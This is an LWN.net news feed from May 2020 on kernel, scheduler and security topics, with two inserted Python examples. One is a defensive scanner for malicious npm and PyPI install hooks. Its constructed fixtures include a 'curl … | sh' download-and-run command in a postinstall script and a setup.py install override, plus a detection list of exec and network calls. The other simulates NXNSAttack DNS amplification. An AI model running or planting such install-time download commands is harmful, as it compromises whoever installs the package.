Feed lwn LWN.net

LWN.net

Link https://lwn.net/
Feed http://lwn.net/headlines/rss
Updated 2020-05-25 11:20
Kernel prepatch 5.7-rc7
The 5.7-rc7 kernel prepatch is out. "So it looks like I was worried for nothing last rc. Of course, anything can still change, but everything _looks_ all set for a regular release scheduled for next weekend. Knock wood."
[$] Imbalance detection and fairness in the CPU scheduler
The kernel's CPU scheduler is good at distributing tasks across a multiprocessor system, but does it do so fairly? If some tasks get a lot more CPU time than others, the result is likely to be unhappy users. Vincent Guittot ran a session at the 2020 Power Management and Scheduling in the Linux Kernel summit (OSPM) looking into this issue, with a focus on detecting load imbalances between CPUs and what to do with a workload that cannot be balanced.
[$] The deadline scheduler and CPU idle states
As Rafael Wysocki conceded at the beginning of a session at the 2020 Power Management and Scheduling in the Linux Kernel summit (OSPM), the combination of the deadline scheduling class with CPU idle states might seem a little strange. Deadline scheduling is used in realtime settings, where introducing latency by idling the CPU tends to be frowned upon. But there are reasons to think that these two technologies might just be made to work together.
Security updates for Friday
Security updates have been issued by CentOS (firefox, ipmitool, kernel, squid, and thunderbird), Debian (pdns-recursor), Fedora (php and ruby), Red Hat (dotnet and dotnet3.1), SUSE (dom4j, dovecot23, memcached, and tomcat), and Ubuntu (clamav, libvirt, and qemu).
[$] Saving frequency scaling in the data center
Frequency scaling — adjusting a CPU's operating frequency to save power when the workload demands are low — is common practice across systems supported by Linux. It is, however, viewed with some suspicion in data-center settings, where power consumption is less of a concern and there is a strong emphasis on getting the most performance out of the hardware. At the 2020 Power Management and Scheduling in the Linux Kernel summit (OSPM), Giovanni Gherdovich worried that frequency scaling may be about to go extinct in data centers; he made a plea for improving its behavior for such workloads while there is still time.
[$] The pseudo cpuidle driver
The purpose of a cpuidle governor is to decide which idle state a CPU should go into when it has no useful work to do; the cpuidle driver then actually puts the CPU into that state. But, at the 2020 Power Management and Scheduling in the Linux Kernel summit (OSPM), Abhishek Goel presented a new cpuidle driver that doesn't actually change the processor's power state at all. Such a driver will clearly save no power, but it can be quite useful as a tool for evaluating and debugging cpuidle policies.
GNOME resolves Rothschild patent suit
The patent suit filed against the GNOME Foundation last September has now been resolved. "In this walk-away settlement, GNOME receives a release and covenant not to be sued for any patent held by Rothschild Patent Imaging. Further, both Rothschild Patent Imaging and Leigh Rothschild are granting a release and covenant to any software that is released under an existing Open Source Initiative approved license (and subsequent versions thereof), including for the entire Rothschild portfolio of patents, to the extent such software forms a material part of the infringement allegation." There is no mention of what the foundation had to give — if anything — for this settlement,
A review of open-source software supply chain attacks
Here's a preprint paper from Marc Ohm, Henrik Plate, Arnold Sykosch, and Michael Meier looking at attacks on language-specific repositories. "Recent years saw a number of supply chain attacks that leverage the increasing use of open source during software development, which is facilitated by dependency managers that automatically resolve, download and install hundreds of open source packages throughout the software life cycle. This paper presents a dataset of 174 malicious software packages that were used in real-world attacks on open source software supply chains, and which were distributed via the popular package repositories npm, PyPI, and RubyGems. Those packages, dating from November 2015 to November 2019, were manually collected and analyzed. The paper also presents two general attack trees to provide a structured overview about techniques to inject malicious code into the dependency tree of downstream users, and to execute such code at different times and under different conditions."
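One of the execution triggers the abstract alludes to is code that runs at the moment the dependency is installed, which is the first thing a reviewer of an unfamiliar npm or PyPI package looks for. The following is an added example written for this page, not code from the paper or its dataset: it lists the npm lifecycle scripts that `npm install` runs for a dependency and statically reviews a setup.py for custom install command classes, `cmdclass` overrides and process or network calls. The manifests and setup.py it scans are constructed samples, not real packages; 198.51.100.7 is a documentation-range address.

```python
import ast
import json

# npm lifecycle scripts that `npm install` runs automatically for a dependency.
NPM_INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

# Fully qualified callees in a setup.py that reach a shell, a process or the
# network; anything on this list in a file that runs during `pip install`
# deserves a look.
EXEC_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.Popen",
    "subprocess.call", "subprocess.check_call", "subprocess.check_output",
    "urllib.request.urlopen", "requests.get", "exec", "eval",
}

# setuptools/distutils command classes a package can subclass to hook install.
INSTALL_COMMANDS = {"install", "develop", "egg_info", "build_py"}


def npm_install_hooks(package_json_text):
    """Return {hook: command} for every lifecycle script that runs on install."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts") or {}
    return {name: cmd for name, cmd in scripts.items() if name in NPM_INSTALL_HOOKS}


def _dotted(node):
    """'os.system' for os.system(...), 'setup' for setup(...), else None."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        prefix = _dotted(node.value)
        return f"{prefix}.{node.attr}" if prefix else None
    return None


def setup_py_findings(setup_py_text):
    """Static review of a setup.py: report subclasses of install-related
    command classes, cmdclass overrides passed to setup(), and process or
    network calls anywhere in the file. These are review leads, not a verdict."""
    tree = ast.parse(setup_py_text)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                base_name = _dotted(base) or ""
                if base_name.split(".")[-1] in INSTALL_COMMANDS:
                    findings.append(f"line {node.lineno}: class {node.name} "
                                    f"subclasses the {base_name} command")
        elif isinstance(node, ast.Call):
            callee = _dotted(node.func)
            if callee in EXEC_CALLS:
                findings.append(f"line {node.lineno}: {callee}() in setup.py")
            elif callee == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.append(f"line {node.lineno}: setup() passes cmdclass "
                                f"(custom install step)")
    return findings


# Constructed samples, not real packages.
BENIGN_PACKAGE_JSON = '{"name": "left-thing", "version": "1.0.0", "scripts": {"test": "jest"}}'
HOOKED_PACKAGE_JSON = """{"name": "left-thing", "version": "1.0.1",
  "scripts": {"test": "jest", "postinstall": "curl -s http://198.51.100.7/i | sh"}}"""
HOOKED_SETUP_PY = """\
import os
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        os.system("curl -s http://198.51.100.7/i | sh")

setup(name="leftthing", version="1.0.1", cmdclass={"install": PostInstall})
"""

if __name__ == "__main__":
    print("benign npm hooks:", npm_install_hooks(BENIGN_PACKAGE_JSON))
    print("hooked npm hooks:", npm_install_hooks(HOOKED_PACKAGE_JSON))
    for finding in setup_py_findings(HOOKED_SETUP_PY):
        print("setup.py:", finding)
```

The setup.py review deliberately reports calls inside methods too: a `run()` on a custom install command is exactly the code that executes during `pip install`, so a reviewer wants to see it even though the scanner cannot prove which functions setuptools will call.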
Security updates for Thursday
Security updates have been issued by Arch Linux (keycloak, qemu, and thunderbird), Debian (dovecot), Fedora (abcm2ps and oddjob), Red Hat (java-1.7.1-ibm, java-1.8.0-ibm, and kernel-rt), SUSE (ant, bind, and freetype2), and Ubuntu (bind9 and linux, linux-aws, linux-aws-5.3, linux-gcp, linux-gcp-5.3, linux-gke-5.3, linux-hwe, linux-kvm, linux-oracle, linux-oracle-5.3, linux-raspi2).
[$] LWN.net Weekly Edition for May 21, 2020
The LWN.net Weekly Edition for May 21, 2020 is available.
[$] The PEPs of Python 3.9
With the release of Python 3.9.0b1, the first of four planned betas for the development cycle, Python 3.9 is now feature-complete. There is still plenty to do in terms of testing and stabilization before the October final release. The release announcement lists a half-dozen Python Enhancement Proposals (PEPs) that were accepted for 3.9. We have looked at some of those PEPs along the way; there are some updates on those. It seems like a good time to fill in some of the gaps on what will be coming in Python 3.9.
Stable kernel updates
Stable kernels 5.6.14, 5.4.42, 4.19.124, 4.14.181, 4.9.224, and 4.4.224 have been released with important fixes. Users should upgrade.
A remote code execution vulnerability in qmail
Just in case anybody out there is still using qmail: a remote code execution vulnerability has just been disclosed. Its CVE number is CVE-2005-1513 because, as it turns out, the problem was reported 15 years ago but the fix was refused by the maintainer. (The identifier dates from Georgi Guninski's 2005 report of integer overflows in qmail's stralloc string-buffer routines on 64-bit systems; the multi-gigabyte requirements quoted below are what it takes to push those length counters past their limits.) "As a proof of concept, we developed a reliable, local and remote exploit against Debian's qmail package in its default configuration. This proof of concept requires 4GB of disk space and 8GB of memory, and allows an attacker to execute arbitrary shell commands as any user, except root (and a few system users who do not own their home directory)."
[$] Bao: a lightweight static partitioning hypervisor
Developers of safety-critical systems tend to avoid Linux kernels for a number of fairly obvious reasons; Linux simply was not developed with that sort of use case in mind. There are increasingly compelling reasons to use Linux in such systems, though, leading to a search for the best way to do so safely. At the 2020 Power Management and Scheduling in the Linux Kernel summit (OSPM), José Martins described Bao, a minimal hypervisor aimed at safety-critical deployments.
Security updates for Wednesday
Security updates have been issued by Debian (bind9 and clamav), Fedora (kernel, moodle, and transmission), Oracle (kernel), Red Hat (ipmitool, kernel, ksh, and ruby), Slackware (bind and libexif), SUSE (dpdk, openconnect, python, and rpmlint), and Ubuntu (linux, linux-aws, linux-gcp, linux-kvm, linux-oracle, linux-riscv and linux-gke-5.0, linux-oem-osp1).
[$] The state of the AWK
AWK is a text-processing language with a history spanning more than 40 years. It has a POSIX standard, several conforming implementations, and is still surprisingly relevant in 2020 — both for simple text processing tasks and for wrangling "big data". The recent release of GNU Awk 5.1 seems like a good reason to survey the AWK landscape, see what GNU Awk has been up to, and look at where AWK is being used these days.
NXNSAttack: upgrade resolvers to stop new kind of random subdomain attack
CZ.NIC staff member Petr Špaček has a blog post describing a newly disclosed DNS resolver vulnerability called NXNSAttack. It allows attackers to abuse the delegation mechanism to create a denial-of-service condition via packet amplification. "This is so-called glueless delegation, i.e. a delegation which contains only names of authoritative DNS servers (a.iana-servers.net. and b.iana-servers.net.), but does not contain their IP addresses. Obviously a DNS resolver cannot send a query to a “name”, so the resolver first needs to obtain the IPv4 or IPv6 address of authoritative server 'a.iana-servers.net.' or 'b.iana-servers.net.' and only then can it continue resolving the original query 'example.com. A'. This glueless delegation is the basic principle of the NXNSAttack: the attacker simply sends back a delegation with fake (random) server names pointing to the victim's DNS domain, thus forcing the resolver to generate queries towards the victim's DNS servers (in a futile attempt to resolve the fake authoritative server names)." At this time, Ubuntu has updated its BIND package to mitigate the problem; other distributions will no doubt follow soon. More details can also be found in the paper [PDF].
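The exchange described in the quote, as an added simulation written for this page (not code from Knot Resolver, BIND or the paper): a toy resolver receives a referral, chases the glueless NS names, and counts the queries it sends to each zone, which gives the amplification factor directly. Assumptions made by the model: each glueless NS name costs one A and one AAAA query to the zone that owns the name; the attacker's server answers with n random names under the victim's zone; and the mitigation modelled is a per-referral cap on glueless NS fetches, with the value 5 chosen for illustration rather than taken from any resolver's actual fix.

```python
import random
from dataclasses import dataclass, field


@dataclass
class Referral:
    """A delegation answer: the zone being delegated, its NS names and any glue."""
    zone: str
    ns_names: list
    glue: dict = field(default_factory=dict)   # ns name -> address


def owner_zone(ns_name):
    """Zone that has to be asked for an NS name's address. The model takes the
    last two labels ('1a2b3c4d.victim.example.' -> 'victim.example.')."""
    labels = ns_name.rstrip(".").split(".")
    return ".".join(labels[-2:]) + "."


class Resolver:
    """Toy iterative resolver that only counts the queries it would send."""

    def __init__(self, max_glueless_fetches=None):
        # None models the vulnerable behaviour: chase every glueless NS name.
        # A small integer models the mitigation: cap the fetches per referral.
        self.max_glueless_fetches = max_glueless_fetches
        self.sent = {}   # zone queried -> number of queries sent to it

    def _query(self, zone):
        self.sent[zone] = self.sent.get(zone, 0) + 1

    def follow_referral(self, referral):
        """Learn nameserver addresses for a referral. Glued names are free;
        each glueless name costs an A and an AAAA query to the zone that owns
        it (model assumption: both address types are looked up)."""
        addresses = {}
        fetches = 0
        for ns in referral.ns_names:
            if ns in referral.glue:
                addresses[ns] = referral.glue[ns]
                continue
            if self.max_glueless_fetches is not None and fetches >= self.max_glueless_fetches:
                break
            fetches += 1
            zone = owner_zone(ns)
            self._query(zone)   # <ns> A
            self._query(zone)   # <ns> AAAA
            # Against a victim the names do not exist, so nothing is learned.
        return addresses

    def resolve(self, referral):
        """One client query: the attacker's authoritative server answers with
        the referral and the resolver then chases its NS names."""
        self._query(referral.zone)
        return self.follow_referral(referral)


def nxns_referral(attacker_zone, victim_zone, n, seed=1):
    """Attacker's answer: n random, glueless NS names under the victim's zone."""
    rng = random.Random(seed)
    names = [f"{rng.getrandbits(32):08x}.{victim_zone}" for _ in range(n)]
    return Referral(zone=attacker_zone, ns_names=names)


def amplification(resolver, referral, victim_zone):
    """Queries the victim receives per query the attacker's server answered."""
    resolver.resolve(referral)
    return resolver.sent.get(victim_zone, 0) / resolver.sent[referral.zone]


if __name__ == "__main__":
    attack = nxns_referral("attacker.example.", "victim.example.", n=100)
    print("unbounded resolver:", amplification(Resolver(), attack, "victim.example."))
    print("capped at 5 fetches:", amplification(Resolver(5), attack, "victim.example."))
    legit = Referral("example.", ["ns1.example."], {"ns1.example.": "192.0.2.1"})
    print("glued referral:", Resolver().follow_referral(legit))
```

With 100 fake names the uncapped resolver sends 200 queries to the victim for the single answer the attacker's server produced; the cap bounds that at 10 regardless of how many names the referral carries, and a legitimately glued referral costs the parent zone nothing either way. The cap is only the resolver-side part of the fix; the quoted advice to upgrade still applies because a vulnerable resolver has no such limit at all.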
[$] Evaluating vendor changes to the scheduler
The kernel's CPU scheduler does its best to make the right decisions for just about any workload; over the years, it has been extended to better handle mobile-device scheduling as well. But handset vendors still end up applying their own patches to the scheduler for the kernels they ship. Shipping out-of-tree code in this way leads to a certain amount of criticism from the kernel community but, as Vincent Donnefort pointed out in his session at the 2020 Power Management and Scheduling in the Linux Kernel summit (OSPM), those patches are applied for a reason. He looked at a set of vendor scheduler patches to see why they are being used.
Security updates for Tuesday
Security updates have been issued by Debian (dpdk and exim4), Fedora (openconnect, perl-Mojolicious, and php), Red Hat (kernel and kpatch-patch), Slackware (sane), and Ubuntu (bind9, dpdk, exim4, linux, linux-aws, linux-aws-hwe, linux-gcp, linux-gke-4.15, linux-hwe, linux-oem, linux-oracle, linux-snapdragon, and linux, linux-aws, linux-lts-xenial, linux-raspi2, linux-snapdragon).
[$] Scheduler benchmarking with MMTests
The MMTests benchmarking system is normally associated with its initial use case: testing memory-management changes. Increasingly, though, MMTests is not limited to memory management testing; at the 2020 Power Management and Scheduling in the Linux Kernel summit (OSPM), Dario Faggioli talked about how he is using it to evaluate changes to the CPU scheduler, along with a discussion of the changes he had to make to get useful results for systems hosting virtualized guests.
[$] The many faces of "latency nice"
A task's "nice" value describes its priority within the completely fair scheduler; its semantics have roots in ancient Unix tradition. Last August, a "latency nice" parameter was proposed to provide similar control over a task's response-time requirements. At the 2020 Power Management and Scheduling in the Linux Kernel summit (OSPM), Parth Shah, Chris Hyser, and Dietmar Eggemann ran a discussion about the latency nice proposal; it seems that everybody agrees that it would be a useful feature to have, but there is a wide variety of opinions about what it should actually do.
Security updates for Monday
Security updates have been issued by Debian (apache-log4j1.2, exim4, libexif, and openconnect), Fedora (chromium, condor, java-1.8.0-openjdk, java-1.8.0-openjdk-aarch32, mingw-ilmbase, mingw-OpenEXR, sleuthkit, and squid), Mageia (jbig2dec, libreswan, netkit-telnet, ntp, and suricata), openSUSE (mailman and nextcloud), SUSE (autoyast2, file, git, gstreamer-plugins-base, libbsd, libvirt, libvpx, libxml2, mailman, and openexr), and Ubuntu (dovecot and json-c).
Kernel prepatch 5.7-rc6
Linus has released the 5.7-rc6 kernel prepatch, which contains a bit more churn than he would like. "That said, there's nothing particularly scary in here, and it's not like this rc6 is outrageously big or out of control. I was just hoping for less."
[$] Utilization inversion and proxy execution
Over the years, the kernel's CPU scheduler has become increasingly aware of how much load every task is putting on the system; this information is used to make smarter task placement decisions. Sometimes, though, this logic can go wrong, leading to a situation that Valentin Schneider describes as "utilization inversion". At the 2020 Power Management and Scheduling in the Linux Kernel summit (OSPM), he described the problem and some approaches that are being considered to address it.
[$] Testing scheduler thermal properties for avionics
Linux is not heavily used in safety-critical systems — yet. There is an increasing level of interest in such deployments, though, and that is driving a number of initiatives to determine how Linux can be made suitable for safety-critical environments. At the 2020 Power Management and Scheduling in the Linux Kernel summit (OSPM), Michal Sojka shone a light on one corner of this work: testing the thermal characteristics of Linux systems with an eye toward deployment in avionics systems.
Security updates for Friday
Security updates have been issued by Debian (apt, inetutils, and log4net), Fedora (kernel, mailman, and viewvc), Gentoo (chromium, freerdp, libmicrodns, live, openslp, python, vlc, and xen), Oracle (.NET Core, container-tools:1.0, and kernel), Red Hat (kernel-rt), Scientific Linux (kernel), SUSE (kernel, libvirt, python-PyYAML, and syslog-ng), and Ubuntu (json-c).
Five years of Rust
It seems that the Rust programming language has only been around for five years. "With all that's going on in the world you'd be forgiven for forgetting that as of today, it has been five years since we released 1.0 in 2015! Rust has changed a lot these past five years, so we wanted to reflect back on all of our contributors' work since the stabilization of the language."
Going above and beyond with Inkscape 1.0 (Libre Graphics World)
Libre Graphics World is running an extensive interview with several Inkscape developers. "I'd say we're at the point of supporting SVG as much as possible, but we've mostly given up trying to add editing features to the SVG specification, as the W3C is dominated by web browsers, which don't need multipage or connectors. I dare not say much more about W3C-specific things. I know that I'm personally disappointed that Inkscape's considerable importance in the SVG creation space does not lend itself to getting the feature we intend to build into Inkscape into the actual SVG specification. This does lead to the problem that going forwards we're likely to have browser incompatibilities."
[$] The weighted TEO cpuidle governor
Life gets complicated for the kernel when there is nothing for the system to do. The obvious response is to put the CPU into an idle state to save power, but which one? CPUs offer a wide range of sleep states with different power-usage and latency characteristics. Picking too shallow a state will waste energy, while going too deep hurts latency and can impact the performance of the system as a whole. The timer-events-oriented (TEO) cpuidle governor is a relatively new attempt to improve the kernel's choice of sleep states; at the 2020 Power Management and Scheduling in the Linux Kernel Summit, Pratik Sampat presented a variant of the TEO governor that tries to improve its choices further.
Three new stable kernels
The 5.6.13, 5.4.41, and 4.19.123 stable kernels have been released. They contain important fixes throughout the kernel tree; users should upgrade.
Security updates for Thursday
Security updates have been issued by Debian (apt and libreswan), Fedora (glpi, grafana, java-latest-openjdk, mailman, and oddjob), Oracle (container-tools:2.0, container-tools:ol8, kernel, libreswan, squid:4, and thunderbird), SUSE (apache2, grafana, and python-paramiko), and Ubuntu (apt and libexif).
[$] LWN.net Weekly Edition for May 14, 2020
The LWN.net Weekly Edition for May 14, 2020 is available.
[$] Subinterpreters for Python
A project that has been floating around in the Python world for a number of years is now working its way toward inclusion into the language—or not. "Subinterpreters", which are separate Python interpreters that can currently be created via the C API for extensions, are seen by some as a way to get a more Go-like concurrency model for Python. The first step toward that goal is to expose that API in the standard library. But there are questions about whether subinterpreters are actually a desirable feature for Python at all, as well as whether the hoped-for concurrency improvements will materialize.
[$] Completing and merging core scheduling
Core scheduling is a proposed modification to the kernel's CPU scheduler that allows system administrators to control which processes can be running simultaneously on the same processor core. It was originally proposed as a security mechanism (a way to keep mutually untrusting processes off the SMT siblings of a single core), but other use cases have shown up over time as well. At the 2020 Power Management and Scheduling in the Linux Kernel summit (OSPM), a group of some 50 developers gathered online to discuss the current state of the core-scheduling patches and what is needed to get them into the mainline kernel.
Security updates for Wednesday
Security updates have been issued by Fedora (java-1.8.0-openjdk and seamonkey), Gentoo (firefox, lrzip, qemu, squid, and thunderbird), Oracle (thunderbird), Red Hat (buildah, kernel, kernel-alt, kernel-rt, kpatch-patch, podman, python-pip, python-virtualenv, and qemu-kvm), Scientific Linux (kernel), Slackware (mariadb), SUSE (openconnect), and Ubuntu (file, firefox, iproute2, pulseaudio, and squid, squid3).
[$] What's coming in Go 1.15
Go 1.15, the 16th major version of the Go programming language, is due out on August 1. It will be a release with fewer changes than usual, but many of the major changes are behind-the-scenes or in the tooling: for example, there is a new linker, which will speed up build times and reduce the size of binaries. In addition, there are performance improvements to the language's runtime, changes to the architectures supported, and some updates to the standard library. Overall, it should be a solid upgrade for the language.
Security updates for Tuesday
Security updates have been issued by Arch Linux (a2ps and qutebrowser), openSUSE (cacti, cacti-spine, ghostscript, and python-markdown2), Oracle (kernel), Red Hat (chromium-browser, libreswan, and qemu-kvm-ma), Scientific Linux (thunderbird), and SUSE (kernel and libvirt).
Hussain: Lord of the io_uring
Shuveb Hussain has posted an extensive introduction to io_uring, complete with examples and a reference guide. "Because of the shared ring buffers between the kernel and user space, io_uring can be a zero-copy system. Copying bytes around becomes necessary when system calls that transfer data between kernel and user space are involved. But since the bulk of the communication in io_uring is via buffers shared between the kernel and user space, this huge performance overhead is completely avoided."
[$] O_MAYEXEC — explicitly opening files for execution
Normally, when a kernel developer shows up with a proposed option that doesn't do anything, a skeptical response can be expected. But there are exceptions. Mickaël Salaün is proposing the addition of a new flag (O_MAYEXEC) for the openat2() system call that, by default, will change nothing. But it does open a path toward tighter security in some situations.
A set of stable kernels
Stable kernels 5.6.12, 5.4.40, 4.19.122, 4.14.180, 4.9.223, and 4.4.223 have been released. They all contain important fixes and users should upgrade.
Security updates for Monday
Security updates have been issued by Arch Linux (chromium and firefox), Debian (libntlm, squid, thunderbird, and wordpress), Fedora (chromium, community-mysql, crawl, roundcubemail, and xen), Mageia (chromium-browser-stable), openSUSE (chromium, firefox, LibVNCServer, openldap2, opera, ovmf, php7, python-PyYAML, rpmlint, rubygem-actionview-5_1, slirp4netns, sqliteodbc, squid, thunderbird, and webkit2gtk3), Oracle (firefox, git, gnutls, kernel, libvirt, squid, and targetcli), Red Hat (thunderbird), SUSE (firefox, squid, and thunderbird), and Ubuntu (mailman).
Kernel prepatch 5.7-rc5
The 5.7-rc5 kernel prepatch is out for testing. "We'll see what the next few weeks bring, but at least for now it all feels normal, and like the 5.7 release is tracking well. So please keep testing, and if you haven't dared a 5.7 pre-release kernel yet, we're well into the 'things look calm and safe to test' time."
[$] Blocking userfaultfd() kernel-fault handling
The userfaultfd() system call is a bit of a strange beast; it allows user space to take responsibility for the handling of page faults, which is normally a quintessential kernel task. It is thus perhaps not surprising that it has turned out to have some utility for those who would attack the kernel's security as well. A recent patch set from Daniel Colascione is small, but it makes a significant change that can help block at least one sort of attack using userfaultfd().
Security updates for Friday
Security updates have been issued by Debian (firefox-esr, salt, and webkit2gtk), Fedora (firefox, mingw-gnutls, nss, and teeworlds), Mageia (firefox, libvncserver, matio, qt4, roundcubemail, samba, thunderbird, and vlc), Oracle (firefox and squid), SUSE (firefox, ghostscript, openldap2, rmt-server, syslog-ng, and webkit2gtk3), and Ubuntu (firefox).
[$] Private loop devices with loopfs
A loop device is a kernel abstraction that allows a file to be presented as if it were a physical block device. The typical use for a loop device is to mount a filesystem image stored in a file. Loop devices are global and shared between users, which causes a number of problems for container workloads where the instances are expected to be isolated from each other. Christian Brauner has been working on this problem; he has posted a patch set solving it by adding a small virtual filesystem called loopfs.
GCC 10.1 Released
The GCC project has announced the release of GCC 10.1. "A year has lapsed away since the release of last major GCC release, more than 33 years passed since the first public GCC release and the GCC developers survived repository conversion from SVN to GIT earlier this year. Today, we are glad to announce another major GCC release, 10.1. This release makes great progress in the C++20 language support, both on the compiler and library sides, some C2X enhancements, various optimization enhancements and bug fixes, several new hardware enablement changes and enhancements to the compiler back-ends and many other changes. There is even a new experimental static analysis pass." More information can be found in the release notes.
Security updates for Thursday
Security updates have been issued by Debian (firefox-esr, keystone, mailman, and tomcat9), Fedora (ceph, firefox, java-1.8.0-openjdk, libldb, nss, samba, seamonkey, and suricata), Oracle (kernel), Scientific Linux (firefox and squid), SUSE (libvirt, php7, slirp4netns, and webkit2gtk3), and Ubuntu (linux-firmware and openldap).
[$] LWN.net Weekly Edition for May 7, 2020
The LWN.net Weekly Edition for May 7, 2020 is available.
[$] Making Emacs popular again
The Emacs editor predates Linux, and was once far more popular, but it has fallen into relative obscurity over the years. In a mega-thread on the emacs-devel mailing list, participants discussed various ideas for making Emacs more "attractive", in both the aesthetic and the "appealing to more users" senses of that term. Any improvements to Emacs in that regard have numerous hurdles to overcome, however. There are technical questions and, naturally, licensing considerations, but there is also the philosophical question of what it is, exactly, that stops the venerable text editor from being more popular.
Stable kernel updates
Stable kernels 5.6.11, 5.4.39, 4.19.121, 4.14.179, 4.9.222, and 4.4.222 have been released. They all contain important fixes and users should upgrade.